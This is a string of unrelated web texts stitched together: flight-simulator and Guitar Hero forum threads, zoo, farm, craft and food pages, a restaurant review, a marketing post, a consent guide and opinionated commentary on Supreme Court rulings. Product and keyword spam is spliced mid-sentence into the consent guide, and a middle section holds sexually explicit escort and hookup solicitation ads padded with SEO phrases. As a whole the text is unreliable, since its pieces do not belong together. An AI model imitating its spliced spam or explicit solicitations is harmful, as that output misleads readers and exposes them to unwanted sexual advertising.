Hi all, I had my first software X-Plane CTD in 11.1 (latest non-beta release). At This Time, are the flight dynamics more realistic in 11.05 or latest non-beta release? I have both and have no problem going back to 11.05.
The crash will most likely not be related to the version of X-Plane you are running - it is most likely a plugin-conflict.
I have no plugin's. I'm not an eye-candy kind of guy. Totally pilot. Lol, infact I couldn't care about cabins, ground services, replay not showing all controls or geography. Default land is good enough for me. Actually the IXEG gave me my first plug-in of Gizmo64. I flew the same flight (ABQ - DAL) in 11.05 today with no crashes where 11.1 did crash. Not harping, just saying : ) I've been flight simming since 1990. I've been with XP since 9. This bird is by far the best. I've got my eye on the upcoming FF A320 but I'm afraid it's going to be too automated. I'm 55 years old and appreciate the classics. I have 70 RW hours in a C-172 (doesn't mean squat compared to 737's, just thought I'd throw it in, lol). I emphatically thank you and your team for this bird. The fact that you are on this forum helping us as much as you are is EXTREMELY impressive to me.
When I started flying on VATSIM, we were using STARS that were VOR to VOR. You couldn't get out of your seat once you started your descent. Today you can dang near take a shower. - John
thanks for your kind words and your post made me chuckle more than once - 47 years here and sharing your sentiments about automated flight ;-). 70h Cessna 172 IS relevant in my book, the underlying principles and problems in getting from A to B safely are pretty much the same!
I am not saying that there is no possible code-change between 11.05 and 11.10 that could trigger a crash - possibly something as simple as a newly added airport going over the RAM limit... especially if the crash is repeatable.
Could you possibly post your log.txt file here (just attach it) - it is found after the crash in your X-Plane 11 main folder. It MAY give us a clue as to what happened.
We certainly have our share of problems with the gizmo-plugin throwing an error message (usually FMS-related), but hard crashes are rarely caused by our bird, with the exception of some plugin incompatibilities that are slow to resolve between us and the other parties.
Attached is my log.txt from "The Great Crash of 12-17". I did go back and confirm that Gizmo64 is my only plugin. Again, thanks for all you do for us. - John
Thanks for the log. As far as I can see there is really nothing to see . Bam, crash out of the blue.
Did it just dump you to the desktop or is was there a window that told you that X-Plane crashed and asked if you wanted to report it to Laminar?
To tell you the truth, there is really nothing we can do about a crash like this - there is nothing to go by for us if X-Plane crashes to desktop, it could be anything :-(
I played it on my roommate's PS2 back when I was in college, but for the last few months I haven't had it. I've just had to listen to the guitar hero section of my playlist and do air-fake-guitar.
But now Jordan and Christina have picked up a PS2, and I immediately went and bought my own copy of Guitar Hero+controller. So basically don't expect me to do anything on the internet or socially pretty much ever again. Sorry.
Star wrote: no prob man! :D by the way is Guitar hero something like Frequency(its a musical game for the PS2)??? :roll:
It's made by the same company! General consensus seems to be that Guitar Hero is more fun, though I haven't played Frequency or Amplitude.
amplitude is plenty awesome, but does not involve actually playing a guitar-like thing, so is a very different experience.
-"Killing In The Name Of" By Rage Against The Machine. In the latest Official Playstation Magazine (Sept 06) on page 26 it talks about Raul Renteria, a QA tester who is very good at the game. "To prove this, Renteria played Rage Against the Machine's 'Killing in the Name' on Expert with his back to the screen, racking up a near perfect score."
-"The New Black" By Every Time I Die. During their performance at the Vans Warped tour Keith Buckley, vocalist for the band, stated that their song "The New Black" would be featured in Guitar Hero 2.
-A song by DragonForce. When a band is documented playing Guitar Hero, speculation is bound to arise. Much like Danny Carey from Tool, and The Darkness, the two guitarists for power metal band "Dragonforce" were spotted playing Guitar Hero. DragonForce is a much requested band for Guitar Hero II, and one must conclude that the thought enters the band's minds that they could possibly appear in a sequel to the game that they are playing.
-A song by Tenacious D. "An official list of new music tracks hasn't been released yet, but PSM was told that we shouldn't be surprised to see some Tenacious D in the game."
-A song by Buckethead. Last year, Marcus Henderon said the following quote: "Without going too much into detail, i'll just say this. Buckethead is very much in our plans for GH2. How? who knows... Where? you'll find out... Why? Cuz he's Buckethead. period."
-A song by Descendents. Marcus Henderson, who recorded songs in both games is also on the song choice committee for Guitar Hero II, he stated in an interview that he has "been in dialogue with Bill Stevenson, their legendary drummer, and I totally want to get them in the game". So we will see what comes out of that. Descendants are an influential early Punk Rock band.
-A song by Tool - MTV.com stated that Tool are "in talks to be featured in the forthcoming "Guitar Hero 2" video game".
EDIT: I have confirmed with RedOctane that Tool and RedOctane have spoken regarding having a song in the game. Nothing has been decided as of 5/18/06.
Marcus Henderson said the following line, though, it's worded largely rhetorical: "I LOVE MAIDEN!!!!!!!!!!!!! One of my favorite bands ever. How would you guys feel about Wasted Years in GH2?"
-"For Those About To Rock" by AC/DC - RedOctane issued a press release for Guitar Hero II, and the title of the release is "For Those About to Rock With Guitar Hero II, We Salute You! RedOctane Announces Fall US Tour Date" Of course, the first sentence of the title are lyrics and the name of a song by AC/DC. The song has not been confirmed, but it seems odd to make such a possible hint if it was unfounded.
Recent rumors have held that Drist may or may not be back, but other than that, I'm ready to ROCK OUT! If you haven't heard of it already and you happen to own a copy of GH, go over to http://www.scorehero.com. You can register scores and see how you compare to some of the best players in the world for each difficulty level (I'm 95th on expert level)!
"Even so you will see that when a drunken man is not leaning against a wall or lamppost, he feels that his only chance of escape from ignominious collapse is get up a decent rate of speed, to obtain a quasi-sobriety of demeanour by rapidity of motion."
odds are the rhythm and slide parts will be part of the backround music and you'll just be expected to play the twin leads or just one of the leads depending on how many people you have.
The first one was awesome and deserves some sort of awesomeness award, but... There's a part of me that wishes to do more than bust out rock-god awesomeness. Something fun... Something whimsical...
Or better yet, an external tool that converts Guitar riffs into controller movements, so that I can play fighting games while rockin' out. And singing.
When you have at your disposal a hammer made of three spacefaring battleships, do you still need to pay taxes?
... what I wonder is why they don't have anything from SIlent HIll, as that's a Konami Property. I would SO rock out to Promise.
EM-002.rv-L "Tem Cu wrote: The first one was awesome and deserves some sort of awesomeness award, but... There's a part of me that wishes to do more than bust out rock-god awesomeness. Something fun... Something whimsical...
EM-002.rv-L "Tem Cu wrote: Or better yet, an external tool that converts Guitar riffs into controller movements, so that I can play fighting games while rockin' out. And singing.
if you could combine the Guitar + Wiimote you would have a "realistic" Macross 7 Fire Valkyrie control system (see http://www.steelfalcon.com/Macross/vf19kai.shtml, "GUITAR-STICK CONTROL SYSTEM"). Rock out and kick ass at the same time!
Yeah, this is what I had in mind too... Now if only there were a way to attach a mic to it. Then I could kick ass while badly mangling HOLY LONELY LIGHT at the top of my lungs...
It should still be up, and if not... well, what can I say? You've all missed out on pure awesomeness.
Tried guitar hero a few days ago. Apparently I suck really bad. But now when I hear songs I see colors.
Will (Foster) and his teenage daughter, Tom (Harcourt McKenzie), have lived off the grid for years in the forests of Portland, Oregon. When their idyllic life is shattered, both are put into social services. After clashing with their new surroundings, Will and Tom set off on a harrowing journey back to their wild homeland.
Please enter your email address below to keep up to date on everything going on at the Esquire Theatre!
One of them, at eye level, gives a better view of all the ways in regalos de marketing directo which this species develops to adapt to the environment.
All our enclosures are designed based on the needs of the animals, and one of their common features is that they allow free access between indoor and outdoor enclosures whenever possible (except for during cold spells or cleaning periods, or for other technical reasons).
The Sahel at the Zoo, situated at the heart of the Zoo, this large complex is devoted to the ecosystem of the Sahel, and in addition to the elephants, giraffes, lions and mongooses already mentioned, more and more Sahel species will be housed there.
The new enclosures are intended to improve the well-being of the species that inhabit them, and are an important teaching resource to help us show the characteristics of the Sahel ecosystem - heavily dependent on a short period of rain and, therefore, very sensitive.
During this phase, we finished the work on the outdoor section of the giraffe enclosure and we built a new enclosure for our banded mongooses.
The farm as you see it today is the result of many years of work, planning, mistakes, improvements, and more work. We didn't get to this point on our own, nor will we continue to more forward alone.
Below you will find business that we choose to work with, professional organizations that we are affiliated with and/or whose philosophies align with our own, as well as farms, books, movies, etc. that have provided much inspiration to us as we travel this journey. For information on any of these businesses, partners, groups or organizations, please click the link to view their web site.
The laws about consent vary by state and situation. It can make the topic confusing, but you don’t have to be a legal expert to understand how consent plays out in real life.
Consent is an agreement between participants to engage in sexual activity. There are many ways to give consent, and some of those are discussed below. Consent doesn’t have to be verbal, but verbally agreeing to different sexual activities can help both you and your partner respect each other’s boundaries.
When you’re engaging in sexual activity, consent is about communicationPolkadot Party Strapless Formal Black Dress BCBGMAXAZRIA and White aw8qP6. And it should happen every time. Giving consent for one activity, one time, does not mean giving consent for increased or recurring sexual contact. For example, agreeing to kiss someone doesn’t give that person permission to remove your clothes. Having sex with someone in the past doesn’t give that person permission to have sex with you again in the future.
You can withdraw consent at any point if you feel uncomfortable. It’s important to clearly communicate to your partner that you are no longer comfortable with this activity and wish to stop. The best way to ensure both parties are comfortable with any sexual activity is to talk about it.
3 Women Daily Neck 4 V Dress Casual Cotton Sleeve Solid Casual Paneled Explicitly agreeing to certain activities, either by saying “yes” or another affirmative statement, like “I’m open to trying.”
The Rape Abuse and Incest National Network (RAINN) website provides general information that is intended, but not guaranteed, to be correct and up-to-date. The information is not presented as a source of legal advice. You should not rely, for legal advice, on statements or representations made within the website or by any externally referenced Internet sites. If you need legal advice upon which you intend to rely in the course of your legal affairs, consult a competent, independent attorney. RAINN does not assume any responsibility for actions or non-actions taken by people who have visited this site, and no one shall be entitled to a claim for detrimental reliance on any information provided or expressed.
The legal definitions for terms like rape, sexual assault, and sexual abuse vary from state to state. Consent often plays an important role in determining whether an act is legally considered a crime.
If someone is pressuring you to engage in sexual activity, it is important to remember that being in this situation is not your fault. Here are some strategies to try.
HTC One X CarbonROM is very useful to enjoy the amazing features of the Googlea??s mobile operating system. CarbonROM is actually based on the Android Open-Source projects. You must know that it takes its code mostly from CyanogenMOD & integrates it under an elegant User Interface that is not only comforting to eyes but also surprisingly smooth and fast.
You must be aware of the details and features that you will be able to take pleasure in with HTC One X CarbonROM. We are going to provide you important information in this regard.
All these features are awesome and can provide a wonderful Android experience to the HTC One X users. After knowing about these tremendously superb things, you must be willing to get the HTC One X CarbonROM as soon as possible.
You can install the HTC One X CarbonROM to have fun with Android 4.2.2 Jelly Bean and make your device worthwhile.
Linda Martel is an android researcher and she is working as an app adviser in Android community. She is MCS, Android app Developer sharing wonder tricks for android users. Google+
Now...if only it would show the status on the list of conversations and not just the "New Hangout" window.
Welcome to Crafty Soccer Mom! Thank you so much for stopping by my blog :) If you are new here, I would love for you to follow me via Google Friend Connect, E-mail, and/or Pinterest. Have a fantastic day and Happy Crafting!
Oh well, we had 11 more, so we tossed that one aside and started with the largest drill bit this time.
Final step consisted of putting the Eyeball on the flameless tea light, and turning on the light. Yep, that easy.
You could use these as little nightlights in the bathroom if you wanted...you know if you are into that sort of thing.
I plan on having my studly assistant drill holes in all the rest and I will put them all over my house around Halloween time.
Lots of possibilities, but over all, this was a fun, very quick, and very inexpensive craft that will for sure be a huge hit!
This is pretty cool. I actually love Halloween. I just discovered your blog and am your newest follower. I have "soccer mom" in my blog name as well. Great minds ;) Come check it out if you wish I blog about crafts, kids activities as well as fashion DIYs.
This made me laugh and I don't even do things for halloween. But think the Goth people might like this as well.
I adore comments from my readers, thank you so much for taking the time to comment and making my day by doing so.
I am a stay at home mother of two wonderful boys. My husband is my best friend, my biggest fan, and I adore him. I love to craft and make new things on a daily basis. My favorite item to craft with is Duct Tape...I lovvvvvve Duct Tape. I also enjoy Upcycling items. Turning trash into treasure if you will. When I'm not crafting I enjoy reading, traveling, shopping, sports and hanging out with friends and family :)
Duct Tape Lanyard So last night I was just sitting here looking at my new Duct Tape that I got this week...So exciting!.. and I c...
Duct Tape Key Wristlet At this point most of you realize my love for Duct Tape I am always looking for new things to make using Duct Tape...
Flexible Ice Pack Tis' the season for owies and boo boo's...I don't know about you, but those cute little kid ice packs aren...
Recycled Plastic Beads Can you guess what I made these beads out of??? Give up?? Already? One more guess....Ok.... A 2 Liter Bottl...
Duct Tape Beads Hey Ladies! Sorry I've been absent for almost a week! I have a show coming up and it's been hard balancing kids, ...
Good Morning! So yesterday I had so much fun with this project and I can't wait to share it with you. For a few years now I've be...
Paper Clip Angels I love Angels..I think they are beautiful :) This is a craft that is fast, easy and inexpensive...great for all ages! ...
Duct Tape Belt I made this Duct Tape Belt for my youngest son Jackson. I love the way it turned out and it was a very quick project. H...
Origami Paper Bookmark Here is a tutorial on how to make this VERY simple corner bookmark out of paper. They are so much fun and this is...
Some mindless easy fun...that's what I am bringing to the blog today! Isn't this cool??!! Your hand appears to be floating on the ...
Thank you for visiting my blog! If you see something you like and decide to share it on your blog, please let me know, I'd love to come visit and check it out. Have a fabulous day!
Bok choy is a common vegetable consumed by every Chinese household. It is one of the commercial variants of Chinensis with choy sum and baby bok choy. Cultivated in China since ancient times, bok choy can be found in soups and stir-fries, appetizers and main dishes. Nonetheless, before it is served to fill your appetite, the portion of bok choy we are eating actually involves many more steps than we can imagine. In the following part, more information about the food pathways of bok choy will be provided.
90% bok choy in Hong Kong is mainly from the mainland China and remaining proportion is from local farmland. Major suppliers in China are Weizhou, Kwanming and Ningxia, which take up 32%, 23% and 39% respectively. Although the distance between Ningxia and Hong Kong requires 55-60 hours traveling time, it becomes a major supplier of Hong Kong since 2007. It is because Ningxia owns a lot of natural quality such as high light intensity and long day time for the growing of crops and therefore is able to produce high quality of vegetables for Hong Kong people. Their state quality checking is also tight so the vegetables imported from them can pass the strict Hong Kong standard in Man Kam To Food Monitoring Center.
The production process of bok choy made no difference comparing with other vegetables. Ploughing and cultivation of land are necessary to make the land ready for uses. The optimal sowing period of bok choy is in August since it is suitable to grow in a windy and cool environment. Its optimal temperature for growth lies between 18-20 Degree Celsius. The total growing period of bok choy will be around two months.
The growing process of bok choy can be divided into three periods, namely the “seedling period”, the “photosynthetic period” and the “heart packing period”. The most critical point in growing bok choy is that it is necessary to add fertilizers including nitrates, phosphorus and calcium in a suitable amount in different growing stages. The yield and the weight of bok choy greatly depend on the appropriate amount added.
In the seedling period, a small amount of fertilizers is needed to support the growth of the young seedling while in the photosynthetic period, a larger amount of fertilizer should be added. It is the most important period for the growth of the roots and leaves. In the last period, the sufficiently large and most leaves are blocked from receiving the sunlight. This leads to a slow photosynthetic and therefore the growth rate is slow. Farms have to be clearly aware of the application of them to produce a better yield. At the same time, farmers also start to prepare for harvesting their crops.
Bok choy from farms may either arrive in wholesale markets or warehouses of the supermarkets. 70% of bok choy will be through the distributed to Hong Kong’s wholesale markets. They are mainly Western Wholesale Food Market and Cheung Sha Wan Wholesale Market. Normally, the peak hours of these markets will be in the early morning at 5-9am. Lorries will be loading newly arrived vegetables for the restaurant or wet market owners to purchase. At 10-12noon, the markets will be cleaned up and the rubbish will be organized to the collection points.
Another route that distributes bok choy through supermarket has emerged since around 2001. Bok choy in supermarkets also mainly comes from licensed farms in China. Supermarkets have set up their own quality checking and sampling system for their imported vegetables. With their own connection to farms, bok choy are delivered to supermarket directly after harvesting, which is regarded as ‘by-pass distribution’.
In the production of bok choy, it may generate plastic waste like bottles and bags. Due to the increased knowledge, they are now reused. In some higher technology farm in NingXia, waste water generated will be converted to hot pressurized steam and used for heating. Biological waste such as weakened bok choy or unwanted parts of bok choy can undergo decomposition to form compost or used as pig’s food. The compost produced can be used to make organic fertilizer for local farmlands or sell to overseas.
For transport and wholesaling, foam boxes are used for holding the bok choy and will become waste after used. In order to reduce the amount of waste and to lower the cost, foam boxes are often reused. The boxes are collected and sent back to mainland China for holding the next batch of bok choy for import. Also, the unsold food items in wholesaling and distribution may contribute to the waste produced in the food network. The surplus food may be collected by charity organizations such as Green Hong Kong and Foodlink Foundation and then distribute to the needy.
Lastly, there is 3200 ton of food waste produced in Hong Kong each day. The leftover food can be made into fertilizer and fish feed. The remaining may undergo incineration or eventually go to the landfill.
The story behind Hoi King Heen is a mystique in itself and to be read like a “local‘s secret”. Somehow most Local local’s already knew and unanimously declare it to be the ABSOLUTE BEST CANTONESE RESTAURANT in Hong Kong, whereas it took 3 years after the arrival of Michelin to finally stamp it with a seal of approval, putting them on the history books as a coveted 1 Star contender. Better late than never! So when will it be Gaddi’s turn? A dim sum session with some overseas guests on one occasion was a little mediocre so that jettisoned our plan a bit to organise a grander dinner, yet non-stop persuasions firing in from all sides by numerous foodies confirms that it’s only their A La Carte dishes where they shine. We finally organised a group dinner to try out their High-Canto dishes and it was a superb meal relatively speaking and there were certainly more highlights than many restaurants in town…
With printed menu. Note that for this occasion we chose to sacrifice the Fortune Chicken and their Soup with Stuffed Pig’s Stomach, to try out other Signature Dishes.
The Marinated Tofu is a Shanghainese invention. The Chili Oil with Anchovies worked very well on some of the dishes as a compliment, loved it. The Soy Bean based chili sauce is also more of a Northern Chinese chilli in my opinion but as usual lovely..
Compared to the one in 天龍軒 , this one had a better egg white texture by far, although the Hua Diao influence there was stronger. Claw wise? Very similar. But at least this came in 1 piece, not 3 self-imploded pieces ~ 8/10
It’s interesting this has been everyone’s favourite dish here, and not only for this particular night! This tasted really beefy and tender, with the papaya softening it up as a natural tenderiser as well as giving it a sweet fruity flavour. From my point of view however, this is probably one of the easier dishes to make from the kitchen as requires less precision ~ 9/10
This is one of Chef Leung’s specialty creations. And it was fried pretty well and crispy, with just the right amount of Salted Egg Yolk coating. The fish-maw inside gave it an extra dimension ~ 10/10
This is similar to above crab claw dish but since it’s recommended we’ll give it a try. It turned out to be the least favoured of the night, as the crab meat was dense yet not sweet enough. The egg white was spoiled by what we suspected was and is finally confirmed as Evaporated Milk on top. The pomelo over-powered the crab in this instance and was also too over-cooked. ~ 2/10
This is presented as a cluster of grapes, a Signature Dish. Don’t think most people got this dish, as the exterior was undercooked and the inside wasn’t salty enough to balance the dish. Think everyone knew beforehand it’s just art for art’s sake than for taste? ~ 6/10
For me, this fried chicken should carry some Red Been Curd flavour on its skin to distinguish it from it’s 炸子雞 cousin. The version here was fried pretty well, the skin was slightly crisp and the meat was moist. The sauce was too diluted weak to my liking ~ 7.5/10
This rice polarized the diners? Some thought the rice was not fried dry enough. Some think the recipe is generic and once again a typical starchy based sauce. IMO, most HOTEL FRIED RICES are not meant to be fried until dry and full of wok-chi from my experience, you’ll encounter the same in many hotel restaurants. It’s suppose to be slightly moist not dry, fluffy and with an elegant wok-chi.. which is very hard to achieve consistently. Judged using this approach, this sophisticated version passed with flying colors. The sauce? Hmmm.
I liked it but everyone is different right? I learned that from drinking many styles of coffee too, you just got to see and understand them for what it is I suppose ! ~ 8/10
The one and only sophisticated pan-fried version of this dumpling in Hong Kong that is famous, you’ll see everyone order this towards the end of the meal here. I’ve had this before - and this time around it was less sweeter which is an improvement! Needs more pickled veggies and minced pork to bring it to perfection. But very good ~ 8/10
Everyone looked forward to this so-called Signature dessert finale, but it was outright disappointing. Everyone absolutely dejected this tremendously. Although the finishing touches were done table side stirring in the egg white, it was the base Almond cream soup which was so cloyingly sweet yet missing a good almond taste, almost like it was fakish. ~ 2/10
For me personally, this was one of the best Cantonese/Chinese Meals I’ve had so far, if not the best in terms of execution, at least the best in terms of Chef’s Creativity. Others think it was pretty good but some dishes could have been better. Another local favourite The Chairman was mentioned to be a better alternative, whereas some on the table who’d dined at both didn’t really get that place, or in that matter Island Tang. So that’s the fun of eating out as a group – everyone is entitled to their own preferences and opinions ! But the quest goes on…
Really agree with your breakdown of the dishes and their respective merits. Especially the demerit of that terrible dessert.
@ Tom - I think after your trip to Bangkok, you'll even more determined to find a really high-end Haute Canton-cuisine too right? I'm still waiting for that day when DPD and a Starred Restaurant can really become distinguishable in their dishes. But yes, I think this was pretty good for HK's standards but some still needed improvement. That dessert seriously...
@ Boo_licious, so how did you like Hoi King Heen overall? Sorry I haven't had time to come past visit you yet. I might go past Singapore soon if my flight allows, although I really shouldn't as I don't have enough holidays to get things sorted! : )
Very interesting! A real mixed bag with some top dishes liked the beef rib interspersed with some real howlers like the crab & pomelo thing. I like the look of the fish maw egg white thing!
Yeh I always think Hotels are trying to be too elegant sometimes, but then again the recipes are too similar to DPD. Needs to distinguish itself more as a Haute dinner!
珠記 [ Hong Kong ] - Fresh Seafood from Ap Lei Chau & Aberdeen, Fair Prices when Ordered with a Budget in Mind !
There were two male birds challenging each other and trying to win the attention of the nearby female bird.
She walked away while they ‘duked’ it out. When the ‘hero’ emerged and I captured him on digital film, he was following her up the hill for a little fun and merriment and family making.
Few of us are in businesses that are so unique that we don’t have any competition. So as a result, we’re constantly having to distinguish ourselves as different, better than, smarter than, more prestigious than, cheaper than…You get the picture. It’s a primitive battle where only the strongest survive. And it’s really hard getting deals done like that.
The key is to position yourself as the go-to expert so that your reputation raises your above the herd. When you do that, you get people seeking you out. When they seek you out, they’re already pre-sold on you. They’ve already decided they want YOU so there is less need for you to ‘convince’ them that you’re the best choice. You become a client magnet!
Speaking – Most people are literally scared to death of speaking in public. You’ve probably heard that when surveyed, people rate speaking in public ahead of dying as their top fear. So if you have the guts to stand up in front of a crowd (even a small one) and have your voice be heard, automatically, you’re a rock star in the eyes of the audience. Even if you’re quaking in your boots on the inside, you’ve still accomplished a mighty feat from their perspective.
Writing – Whether writing articles for a national publication or your local neighborhood periodical, having your name in print makes you look smart! Clearly the national publication will get you seen by WAY more people, but you’ll get credibility none-the-less with the readers of your work
Publicity – Being written about is even more compelling. That third party endorsement goes a long way toward building credibility. When someone with familiarity, name recognition and credibility (like a report) writes about you, their importance and credibility transfers over to you. It’s like having someone make a referral introduction for you.
I’ve been using all three of these strategies for years and now I get to reap the benefits of them. Wherever I go, people tell me “I see you everywhere!”
Can you imagine how great (and humbled) that makes me feel? Can you imagine if people were saying that about you, that you wouldn’t have to work so hard to dredge up new clients? You betcha! So start using these three magic strategies to raise your visibility, credibility and client-magnet quotient.
This entry was posted in Uncategorized and tagged unique review games, unique reviews on September 12, 2017 by emma.
Love To Lick... If you know where i'm coming from... i have a nice booty, compassionate, brown hair, blue eyes, and i keep my weight around 120lbs. give me an email with your pics and there's a chance we must meet up very quickl, (Medford, Oregon )
i am basically a lady that would love being able to to have no strings relationship with a freaky man, i've been attached for 5years and i am really getting tired of getting the same exact escort service to have sex with every eveningy
Excellent On The Previous decrease! If you can understand where im coming from... i have a nice body, compassionate, blondish hair, brown eyes, and about 130lbs. send me a message with what you want to do with me with a picture and it's possible that we will meet up super soo, (97501, Medford, Oregon)
i am only a escort service lady that expects to have no strings attached fun with a kind stud, unfortunately i've been attached for 2years and im totally bored of receiving the same dick nightlyn
Managed your friends bail for you? Do you want business this evening? Don't want to go alone, even though is there a new restaurant you want to try? Do you have a favorite spot you are aware would be chat escort and dating service better by using a time? Effectively! Look no further due to the fact we have been here to conserve your evening! We have been two 21 years old females, in university and would love to devote the evening from the business of any gentleman! Please tell me there exists an individual this way out there.
I would desire to just fulfill an enjoyable guy to hold out with and see where it is. Willing to try to see what it gets me... hopefully I get what Im looking for, though im not too sure about this! You should have outstanding appearance, that's always important, and understand how to be seriously dating pittsburgh escort services in a NSA layout. My spot can be obtained but that is up to you... I actually do not imagination in any event. Must clearly be DnD free. Pictures are usually helpful
Searching for somebody to ride on the rear of your motorcycle? Not trying to find drama or to bring it to you... so remember to be solitary. Don't reply if you don't have a backrest on the passenger seat...yes you could say I'm picky about that request.Because when escort service hit the gas I don't want to fall on my ass.And I am a woman with curves...keep looking if you want theshort and thin, and petite.Summer is here! So let's ride! Pic 4 Pic.
My wife became a hotwife four years in the past and has got some excellent journeys. She is with 18 guys and three partners and adored evryone of which.
I'm impulsive to your wrong doing. Love the anticipation and intrigue. I'm accessible to most nearly anything but no hazard or ache. Serial killers do not need to use (laugh). I'm here looking for companionship and the companionship of your guy who doesn't want me dating escort services in ontario his mommy.I love my lovers to become aggressive and acquire-charge. Somebody that can teach me exciting and new things. Drop me a line with your phone and a photo if this sounds good to you.
Searching for a amazing man to connect with. No drama with out strings. I like sucking on a great tough cock and achieving my pussy licked like an icecream cone. If you think you are man enough for the job then prove it to me. I'll explain to you how the female should deal with a person. I am just spontaneous and enjoyable. Must like a very good porn flick and then tell me how you will enjoy it. oel int'l dating escort services in contact with me so "we" could get sum make contact with.
Went along to cafes tonight and emerged home by itself. Looking to transform that tomorrow nighttime. I'm searching forcute and athletic, single person in their past due 20s to very early 30s who doesn't do any medicines for connecting 1 or 2 instances per week in the course of nights (the only real time I'm offered because of operate routine). I'm 5'2", 150lbs, B cup., Answer using a photo or perhaps a outline. Include screen name if you want escort service chat, which may be the best way to getting my attention.
Moda, güzellik, magazin, sağlık, yaşam ve teknoloji hakkındaki en güncel haberler Trendus bülten ile e-posta adresinize gelsin.
Recently, there have been some huge rulings from the Supreme Court of the United States. Let's go over a few, shall we?
○ JANUS v. AMERICAN FEDERATION OF STATE, COUNTY, AND MUNICIPAL EMPLOYEES, COUNCIL 31, ET AL. - In a 5-4 ruling, Government workers, as a result of this ruling, can no longer be compelled to pay "fair share" fees to support collective bargaining and other union activities. The employees have a right not to underwrite political activities which go beyond contract negotiations over pay and benefits. These are regarding fees paid by non-members.
“This procedure violates the First Amendment and cannot continue,” Associate Justice Samuel Alito wrote in the majority opinion. “Neither an agency fee nor any other payment to the union may be deducted from a non-member’s wages, nor may any other attempt be made to collect such a payment, unless the employee affirmatively consents to pay.”
The ruling only applies to public-sector employees, but may over-spill to private sector unions, and may be a move that could eventually lead to a right-to-work condition throughout the country, which may disallow the practice of mandatory union membership in order to work.
This ruling overturns the Abood v. Detroit Board of Education in 1977, which allowed States to compel public employees to pay money supporting collective bargaining and any other union activities, even if they were not union members.
The key plaintiff in the more recent case was Mark Janus, an Illinois state employee, who pays about $550 annually to the powerful public-sector union known as AFSCME. While not a member of the union, he is required under state law to hand over a weekly portion of his paycheck.
"I work for Health and Family Services, and I'm forced to pay money to a union that then supports political causes that I don't agree with," Janus told Fox News.
President Trump cheered the court decision on Twitter, writing: “Supreme Court rules in favor of non-union workers who are now, as an example, able to support a candidate of his or her choice without having those who control the Union deciding for them. Big loss for the coffers of the Democrats!”
Justices split 4-4 on the issue in a similar case two years ago, just after Antonin Scalia died. But with Neil Gorsuch now filling the vacancy left by Scalia, he was seen as the deciding vote this time.
Labor leaders oppose so-called "free riding" by workers like Janus, however, and say they have a legal duty to advocate for all employees.
The ruling was constitutional, and within the federal court's authority. In reality, public sector unions, or at least the federal unions, are a conflict of interest and are unconstitutional. The ultimate step in the right direction would be to eliminate public sector unions overall.
○ NATIONAL INSTITUTE OF FAMILY AND LIFE ADVOCATES, DBA NIFLA, ET AL. v. BECERRA, ATTORNEY GENERAL OF CALIFORNIA, ET AL. - California was the leader in the movement to silence pro-life pregnancy centers, and compel their speech. A.B. 775 in California forced these pregnancy centers to advertise abortion centers on all of their literature, and in the facility. The disclosure that these centers were being compelled to post was, "California provides free or low-cost abortion and contraception services," and then an address for the nearest abortion clinic was required to accompany it.
In a 5-4 decision, the U.S. Supreme Court struck down the California law mandating that pro-life pregnancy centers advertise where clients may get an abortion, which also struck down all other similar State laws around the country.
The message from the Supreme Court? Government can’t compel citizens to promote messages they don’t agree with. This ruling may also have a huge impact on other issues, such as whether or not a cake baker may be compelled to place certain messages on a cake they may not agree with politically or morally.
“No one should be forced by the government to express a message that violates their convictions, especially on deeply divisive subjects such as abortion,” Michael Farris, who argued the case at the Supreme Court, said in a formal statement following the decision.
“In this case, the government used its power to force pro-life pregnancy centers to provide free advertising for abortion,” said Farris, who is president, CEO, and general counsel of the Christian legal group Alliance Defending Freedom. “The Supreme Court said that the government can’t do that, and that it must respect pro-life beliefs.”
In the majority opinion, Justice Clarence Thomas wrote that the state law “unduly burdens protected speech,” and in a concurring opinion, Justice Anthony Kennedy said the government can’t compel citizens to promote a message they don’t agree with.
“Governments must not be allowed to force persons to express a message contrary to their deepest convictions,” Kennedy wrote. “Freedom of speech secures freedom of thought and belief. This law imperils those liberties.”
Thomas and Kennedy were joined in the majority by Chief Justice John Roberts and Justices Samuel Alito and Neil Gorsuch. Roberts, Alito, and Gorsuch also joined in Kennedy’s concurring opinion.
The California law also required unlicensed pregnancy centers, which offer adoption referrals and nonmedical resources other than abortions to expectant mothers, to include “large disclosures about their nonmedical status” in their advertising.
In a statement posted on Twitter, the National Abortion and Reproductive Rights Action League criticized the decision, saying that the Supreme Court “ruled that unlicensed fake women’s health centers are free to dress up as doctors and deliberately lie to women about their #reprohealth.”
In my experience, explaining that the moving being inside a woman's womb is a "baby" is not a lie, nor fake. For pro-life centers with connections to doctors, therefore allowing them to operate with ultrasounds in place, nothing usually needs to be said. The image of a baby stirring in the womb, or the sound of its heartbeat, is usually enough to encourage a woman to change her mind about having an abortion.
Tony Perkins, president of the Family Research Council, said in a written statement that the decision is common sense.
“The U.S. Supreme Court has ruled the state of California was clearly in the wrong in this case and all Americans, whether pro-life or not, should be relieved with the Supreme Court’s decision,” Perkins said. “What if the government made a vegan grocer post ads for the local butcher shop? Everyone would agree that that’s not fair. This case is no different and thankfully, the court recognized that fact.”
The ruling was constitutional and the federal court has the authority over the case, in my opinion, not necessarily because of the First Amendment connection, but because in the 14th Amendment it states that States cannot make laws that "deny to any person within its jurisdiction the equal protection of the laws." A.B. 775 did not apply to all facilities, it singled out opponents of abortion. That said, it is, of course, common sense that government should not be able to compel your speech or business practices in such a manner that it violates your conscience or moral standing. Then again, we know for the supporters of A.B. 775 it wasn't about the rule of law, or equal protection. It was simply about forcing into place their ideology, and doing whatever they could to silence the opposition.
○ TRUMP, PRESIDENT OF THE UNITED STATES, ET AL. v. HAWAIIET AL. - The case was not really challenging President Trump's ability to execute the laws of the United States as provided in Article II of the United States Constitution as much as it was challenging federal laws on the books, and if they are "just" laws based on an ideological template that claims restricting anyone from entering the United States for any reason is somehow racist or unconstitutional.
